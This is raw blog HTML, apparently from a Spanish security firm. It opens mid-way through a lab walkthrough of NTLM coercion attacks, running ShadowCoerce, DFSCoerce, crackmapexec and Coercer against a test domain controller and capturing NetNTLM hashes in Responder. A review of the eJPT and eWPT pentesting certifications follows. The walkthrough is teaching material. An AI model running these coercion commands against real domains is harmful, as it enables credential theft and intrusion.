href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5en1l9nMXyV1Vef-3jzGpn10jR0QEVqELInKBhJK-KyYczKc6TzVXDCCROxLv7M-9bsx8mJChMSuKu1o59k10HI082KQIUSAlpP9WEaeD16Z3i8dS31TnRB-ZwTqQ7CTxU9H-YMGh-6MpjU8eqonTLHcMBepkk0WukBrCOGUa5f9uvLLvTdI-wtYPpm2/s436/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="42" data-original-width="436" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5en1l9nMXyV1Vef-3jzGpn10jR0QEVqELInKBhJK-KyYczKc6TzVXDCCROxLv7M-9bsx8mJChMSuKu1o59k10HI082KQIUSAlpP9WEaeD16Z3i8dS31TnRB-ZwTqQ7CTxU9H-YMGh-6MpjU8eqonTLHcMBepkk0WukBrCOGUa5f9uvLLvTdI-wtYPpm2/w640-h62/1.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Explotación</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tras comprobar que el RPC denominado como “MS- FSRVP” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como <a href="https://github.com/ShutdownRepo/ShadowCoerce">ShadowCoerce </a>la cual tiene asignada el identificador <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30154">CVE-2022-30154</a>. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: courier;">python shadowcoerce.py -d "CORP" -u "bob" -p "<Password>" attack_machine dc.corp.lab</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Eso1FJDuJm1wJDWRMFPA11x3RLJWJFIZLskreh5QR8pk-jLem8NqwzQ20hW9OZ51kyED0llxbAdeULZVNdK7QWBt2NMyaykcQWumYoXXlM7ORjc4KbL3xdhGSqmV5vKJPs44wnsZ_ggSooIT-d9AiakmfD8kX1I3cMP3xaZ0rtBlHz26JzkXuz3mnkZE/s754/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="159" data-original-width="754" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-Eso1FJDuJm1wJDWRMFPA11x3RLJWJFIZLskreh5QR8pk-jLem8NqwzQ20hW9OZ51kyED0llxbAdeULZVNdK7QWBt2NMyaykcQWumYoXXlM7ORjc4KbL3xdhGSqmV5vKJPs44wnsZ_ggSooIT-d9AiakmfD8kX1I3cMP3xaZ0rtBlHz26JzkXuz3mnkZE/w640-h134/2.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Se puede observar la captura del hash NetNTLM en la herramienta Responder. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpSmxX2gWZh34wBFuUYpXb6xqqI1kFnnu7aRwtahPHQZH8Yqo2XcRhhr6YUx5ao5vuu8KyLx88hAywTKZMO3l8p6xhMkMpl5arjhQZ7Qwq5AS2DOt4WXdicm1fuEnJwTPOdvU72NFVJhRaN5M2D0puCtWzfxoPBdge81WmazDWnXAhWNeQ1qqDMMpacie8/s938/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="153" data-original-width="938" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpSmxX2gWZh34wBFuUYpXb6xqqI1kFnnu7aRwtahPHQZH8Yqo2XcRhhr6YUx5ao5vuu8KyLx88hAywTKZMO3l8p6xhMkMpl5arjhQZ7Qwq5AS2DOt4WXdicm1fuEnJwTPOdvU72NFVJhRaN5M2D0puCtWzfxoPBdge81WmazDWnXAhWNeQ1qqDMMpacie8/w640-h104/3.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">MS-DFSNM</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979">MS-DFSNM</a> es el Remote Procedure Call relacionado con el Sistema de archivos distribuidos (DFS): Protocolo de gestión de espacios de nombres. Proporciona una interfaz RPC para administrar configuraciones DFS. </span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></h4><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comprobación</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Al igual que en el caso de MS-EFSR, haremos uso de la herramienta <a href="https://github.com/byt3bl33d3r/CrackMapExec">crackmapexec</a>, a través de la ejecución del módulo “dfscoerce” y mediante el uso usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”, para la comprobación de si el servidor es o no vulnerable, pero esta vez con un usuario del dominio previamente comprometido:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: courier;">crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "<Password>" -M dfscoerce</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQGxPCiN5dIFLAC8_2EenA6kmerchXRANXtP60srXtvFIWjPR9T5ckpLUNutuBWxREnw6u15AoLBIw5SBSjAhydfc6QWJnNz_D-GgIZ8VOi4G33TTNk_2thSzniaUQuqrrK-gwWZfkK1A3CApOz3U7P4xb58UuwfytUnMLw3M_prt51wKXLWhpJow1TZMU/s1139/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="89" data-original-width="1139" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQGxPCiN5dIFLAC8_2EenA6kmerchXRANXtP60srXtvFIWjPR9T5ckpLUNutuBWxREnw6u15AoLBIw5SBSjAhydfc6QWJnNz_D-GgIZ8VOi4G33TTNk_2thSzniaUQuqrrK-gwWZfkK1A3CApOz3U7P4xb58UuwfytUnMLw3M_prt51wKXLWhpJow1TZMU/w640-h50/0.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Explotación</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tras comprobar que el controlador de dominio es vulnerable, se procederá a la explotación de del mismo mediante una PoC denominada como <a href="https://github.com/Wh04m1001/DFSCoerce">DFSCoerce </a>la cual fue publicada en junio de 2022.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: courier;">python3 dfscoerce.py -d "CORP" -u "bob" -p "<password>" attack_machine dc.corp.lab</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_0xbMrPjGchotaafd7vPtodf1knrJANQ7M6jvMamoGSccUJ7tpiiV-yS061UAaT086-77oDMsp8BnpwkGOVjBsZAFUtv9ctPW7yNxc3zPN0J9tNdPQgpn9M6fnmsFaSeJa8udG6KPkPt_uBC66MaQuOAafqfesGfbJJUZgSYdkTfc5WWyzaVeRahIfWj/s735/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="185" data-original-width="735" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8_0xbMrPjGchotaafd7vPtodf1knrJANQ7M6jvMamoGSccUJ7tpiiV-yS061UAaT086-77oDMsp8BnpwkGOVjBsZAFUtv9ctPW7yNxc3zPN0J9tNdPQgpn9M6fnmsFaSeJa8udG6KPkPt_uBC66MaQuOAafqfesGfbJJUZgSYdkTfc5WWyzaVeRahIfWj/w640-h162/1.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Se
puede observar la captura del hash NetNTLM en la herramienta Responder. <o:p></o:p></span></p><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1mRhyphenhyphenixaH-x1F44n2mAhXVcVVlWCRaWjY4QZv9HuDZofE3lefIbVFwyuAkInM4YW4IetrcJdtD-mnfK2gM0NpymK6ReNBTo48HGEQmpahNfGLItKj-zSMGEHyJVC1UxTgOGexxBsluKQG8AtPPN0xwEFAVhqge3MN_PDx4GKQTbOhiQSt0cmMgkHP2cDq/s938/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="147" data-original-width="938" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1mRhyphenhyphenixaH-x1F44n2mAhXVcVVlWCRaWjY4QZv9HuDZofE3lefIbVFwyuAkInM4YW4IetrcJdtD-mnfK2gM0NpymK6ReNBTo48HGEQmpahNfGLItKj-zSMGEHyJVC1UxTgOGexxBsluKQG8AtPPN0xwEFAVhqge3MN_PDx4GKQTbOhiQSt0cmMgkHP2cDq/w640-h100/2.png" width="640" /></span></a></div></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: left;"><h3 style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Todos para uno y uno para todos</span></h3><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://github.com/p0dalirius/Coercer">Coercer </a>es una herramienta escrita en python la cual prueba múltiples métodos de realizar una "Coerce Authentication", además de incluir todos los descritos anteriormente.</span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tiene tres modos de ejecución, scan, coerce y fuzz. Un ejemplo de ejecución en modo scan sería el siguiente:</span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: courier;">coercer scan -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"</span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8jVliccfKzqjuCdm622MmQiMYxgw-SKb3kokCJh5e3z_8y4rDpEE4OGf-wWwWgqBhRfINOKiOv-INQTqeskemJiAGV9osFoc1akiSBt3Y7zih5_kWsuJM0xer1LUpuVBgg4zwEXsWRIfEUo9r-DHwdikR7WjR5ZoUvKmjepy7HKVnuMSbVeC6yvzJdJ6g/s941/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="588" data-original-width="941" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8jVliccfKzqjuCdm622MmQiMYxgw-SKb3kokCJh5e3z_8y4rDpEE4OGf-wWwWgqBhRfINOKiOv-INQTqeskemJiAGV9osFoc1akiSBt3Y7zih5_kWsuJM0xer1LUpuVBgg4zwEXsWRIfEUo9r-DHwdikR7WjR5ZoUvKmjepy7HKVnuMSbVeC6yvzJdJ6g/w640-h400/1.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Un ejemplo de ejecución en modo coerce sería el siguiente:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: courier;">coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "<contraseña>" -d "CORP.LAB"</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBsBc9TrU-NS57Bbo7WgHRdlo9Dd4vi-zYRJPfkmeO8SdNkKGQEDkpeFquTsymk5OJsdwXhUFBlRfkGPSMU4Sev64QvkV0s6Clone2WNL_-jRF9SQKZY7xL7ML4xSCKDAKdbC0K2jIec-TLV_6kvc7_XN6dnegWzKzMGxaL-9xyDVu3IXpl_9TTuRI4oGf/s941/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="529" data-original-width="941" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBsBc9TrU-NS57Bbo7WgHRdlo9Dd4vi-zYRJPfkmeO8SdNkKGQEDkpeFquTsymk5OJsdwXhUFBlRfkGPSMU4Sev64QvkV0s6Clone2WNL_-jRF9SQKZY7xL7ML4xSCKDAKdbC0K2jIec-TLV_6kvc7_XN6dnegWzKzMGxaL-9xyDVu3IXpl_9TTuRI4oGf/w640-h360/2.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cheat Sheet </span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8vAsZE2c2WgPTjYYxk1u2RTyy2t-FsEdl1HZtVlGA1Vm6nVCLd46netDGBtzkq5XwGwDerLeC2uVAWFv1CMXmzx3JlhDxcB45V3IMVwGNaVSpxbZrGGwKSr2WuMqkBEYtO05lLbFvz9e0XXY-XYqbmqdH6hMNUwXyGhRZbhkVm0WDRY_qEMup7PvukHi/s1102/2024-02-19%2010_03_03-Coerce_Parte_2%20%20-%20%20Guardado%20por%20%C3%BAltima%20vez%20por%20el%20usuario%20-%20Word.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="373" data-original-width="1102" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim8vAsZE2c2WgPTjYYxk1u2RTyy2t-FsEdl1HZtVlGA1Vm6nVCLd46netDGBtzkq5XwGwDerLeC2uVAWFv1CMXmzx3JlhDxcB45V3IMVwGNaVSpxbZrGGwKSr2WuMqkBEYtO05lLbFvz9e0XXY-XYqbmqdH6hMNUwXyGhRZbhkVm0WDRY_qEMup7PvukHi/w640-h216/2024-02-19%2010_03_03-Coerce_Parte_2%20%20-%20%20Guardado%20por%20%C3%BAltima%20vez%20por%20el%20usuario%20-%20Word.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div class="separator" style="clear: both; text-align: justify;"><a href="https://www.linkedin.com/in/dimas-pastor/" style="background-color: white; color: #2288bb; font-family: "Barlow Semi Condensed"; font-size: 13.2px; text-align: right; text-decoration-line: none;"><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span><span> </span>Dimas Pastor</a><span style="background-color: white; color: #666666; font-family: "Barlow Semi Condensed"; font-size: 13.2px; text-align: right;">, Senior Analyst en </span><a href="http://www.zerolynx.com/" style="background-color: white; color: #2288bb; font-family: "Barlow Semi Condensed"; font-size: 13.2px; text-align: right; text-decoration-line: none;" target="_blank">Grupo Zerolynx</a><span style="background-color: white; color: #666666; font-family: "Barlow Semi Condensed"; font-size: 13.2px; text-align: right;">.</span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><br /></div></div></div></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-57796601843385987152024-02-12T09:00:00.012+01:002024-02-12T17:31:37.333+01:00Análisis de Certificaciones de Seguridad Ofensiva | Parte I<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUQ9OWKw0lHo9dZ5hjqSS086B-Kok_q1mGjWTfG2yvumL0EwDDxaWvUlONEmrzGrIejdCLII5M92dMMlgFZoFqD6_Ia73Oh2lmRDU5PRpXUBTYmVSU2rN6dWwIcwirUVZAtdOJH4IUtuhuS45Xazl3YRNgha5sbqp8JpFamzzoXM3-b-Mj0ryeawkPF0Jg/s1920/El%20texto%20del%20p%C3%A1rrafo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUQ9OWKw0lHo9dZ5hjqSS086B-Kok_q1mGjWTfG2yvumL0EwDDxaWvUlONEmrzGrIejdCLII5M92dMMlgFZoFqD6_Ia73Oh2lmRDU5PRpXUBTYmVSU2rN6dWwIcwirUVZAtdOJH4IUtuhuS45Xazl3YRNgha5sbqp8JpFamzzoXM3-b-Mj0ryeawkPF0Jg/w640-h360/El%20texto%20del%20p%C3%A1rrafo.jpg" width="640" /></a></div><br /><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las certificaciones juegan un papel crucial en el mundo de la ciberseguridad, cumpliendo dos funciones principales. En primer lugar, ayudan a adquirir conocimientos y habilidades en diversas áreas de la ciberseguridad y, en segundo lugar, proporcionan una manera de demostrar que se poseen esos conocimientos y habilidades. El problema es que, debido a la gran cantidad de certificaciones existentes hoy en día, elegir la adecuada puede resultar complicado.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En este artículo, exploraremos diferentes certificaciones que consideramos como opciones sólidas para aquellos que desean especializarse en el área de la seguridad ofensiva. Todas ellas son totalmente prácticas y su examen simula un escenario real en el que se deben comprometer diversos activos, ya que esta la mejor manera de demostrar que se poseen habilidades técnicas</span></p><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">eJPT (Junior Penetration Tester)</span></h3><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Descripción</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La primera certificación de la lista es el eJPT (Junior Penetration Tester), de la entidad INE Security. Se trata de una certificación básica donde se valida que se posean los conocimientos, habilidades y capacidades necesarias para desempeñar el rol de un pentester junior.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Público objetivo</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El eJPT es una certificación sencilla pensada para aquellos que se están introduciendo en el mundo del pentesting. Es importante destacar que, aunque se trata de una certificación de dificultad baja, se presupone que los candidatos poseen un conocimiento previo en redes y sistemas operativos.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Contenido</span></h4><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">Metodologías de Evaluación: Encontrar sistemas en una red, identificar puertos abiertos, servicios y extraer información de una compañía de fuentes públicas. </span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Pentesting de Hosts y Redes: Identificar vulnerabilidades en sistemas, identificar y modificar código de exploits, manejo de distintas herramientas como metasploit, realizar pivoting mediante port forwarding, realizar ataques de fuerza bruta y crackeo de hashes.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Pentesting de Aplicaciones Web: Identificar vulnerabilidades en aplicaciones web, enumerar ficheros y directorios ocultos y explotar vulnerabilidades web como Cross-Site Scripting (XSS) o SQL injection.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Auditoría de Hosts y Redes: Enumerar información de red y servicios a raíz de archivos encontrados en sistemas objetivo. Además, recopilar información de cuentas de usuario en sistemas objetivo y volcar hashes.</span></li></ul><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Formato de examen</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El examen tiene una duración de 48 horas y consta de 35 preguntas de opción múltiple, cada una con 4 posibles respuestas, junto con un componente práctico de laboratorio. En el laboratorio se proporciona acceso a una máquina Kali Linux conectada a la red objetivo. La finalidad del examen es realizar un pentest de tipo Black Box (Caja Negra) a la red objetivo y a todas las redes internas a las que se tengan acceso durante el laboratorio. Durante la realización del examen, se permite el uso de todos los recursos que se quieran como apoyo. La puntuación del examen se mide en una escala de 100 puntos, siendo necesario alcanzar una calificación igual o superior a 70 para aprobar.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La opción de presentarse al examen está disponible en la página web de INE Security por 249$. Esta opción incluye dos oportunidades para aprobar el examen con hasta 180 días de diferencia entre los dos.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">INE Security también ofrece un curso de preparación para el examen denominado PTS (Penetration Tester Student). Este curso está incluido en el Fundamental Pass, que forma parte de la suscripción estándar de su academia online. La tarifa mensual de suscripción es de 39$, mientras que la anual es de 299$.</span></div><div style="text-align: justify;"><br /></div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span><span style="font-family: Barlow Semi Condensed;">eWPT (Web Penetration Tester)</span></h3><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Descripción</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El eWPT de INE Security es una certificación de dificultad media que valida que una persona tenga los conocimientos, capacidades y habilidades necesarias para poder desempeñar el trabajo de un pentester más concretamente en aplicaciones web.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Público objetivo</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La certificación está dirigida a aquellos con fundamentes básicos en redes, sistemas y pentesting que buscan perfeccionar sus habilidades en pentesting Web. Es adecuada, por ejemplo, para personas que han obtenido una certificación básica de pentesting como el eJPT y desean aumentar sus conocimientos en la parte de Web.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Contenido</span></h4><div style="text-align: justify;"><ul><li><span style="font-family: Barlow Semi Condensed;">Evaluar con precisión aplicaciones web según las prácticas metodológicas y estándares de la industria, identificando vulnerabilidades conforme a la guía de pruebas de seguridad web de OWASP.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Extraer información de sitios web mediante técnicas de reconocimiento pasivo y OSINT, así como de los dominios, subdominios y direcciones IP de una organización objetivo.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Examinar ficheros de metadatos de servidores web en busca de exposición de información y determinar el tipo, versión, tecnologías o frameworks utilizados en una aplicación web.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Analizar la estructura de aplicaciones web para identificar vectores de ataque potenciales y descubrir archivos y directorios ocultos no accesibles mediante navegación normal.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Identificar y aprovechar vulnerabilidades derivadas de la implementación incorrecta de métodos HTTP, así como de configuraciones erróneas en servidores web.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Testear aplicaciones web en busca de credenciales predeterminadas y contraseñas débiles, y sortear mecanismos de autenticación frágiles o rotos.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Identificar y aprovechar vulnerabilidades en la gestión de sesiones, así como explotar componentes de aplicaciones web vulnerables y desactualizados.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Realizar ataques de fuerza bruta contra formularios de inicio de sesión y aprovechar vulnerabilidades de inyección de comandos para la ejecución remota de código.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">Identificar y aprovechar vulnerabilidades de XSS reflejado, almacenado, y de inyección SQL, así como vulnerabilidades en gestores de contenidos como por ejemplo WordPress.</span></li></ul></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></h4><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Formato de examen</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El examen se estructura en dos partes: una práctica y otra de redacción de informe, cada una con una duración de 7 días. En la parte práctica, se proporciona una "carta de compromiso", que es un documento con todos los detalles necesarios para llevar a cabo el examen. Durante esta etapa, se requiere comprometer distintas aplicaciones web.</span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></h4><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La opción de presentarse al examen de la certificación eWPT junto con tres meses de formación está disponible en la página web de INE Security por 599$. No es posible realizar el examen sin adquirir también la formación.</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Estad atentos porque próximamente os iremos contando más acerca de las certificaciones de seguridad ofensiva.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/javier-martin-gimeno/">Javier Martín</a>, analista de ciberseguridad en <a href="http://www.zerolynx.com">Zerolynx</a>.</span></div><div style="text-align: justify;"><br /></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0tag:blogger.com,1999:blog-7938680518783212855.post-20988736100985812762024-02-05T09:00:00.006+01:002024-02-06T10:02:11.325+01:00Coerce | Parte 1<p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"></span></p><div class="separator" style="clear: both; text-align: center;"><span style="font-family: Barlow Semi Condensed;"><a 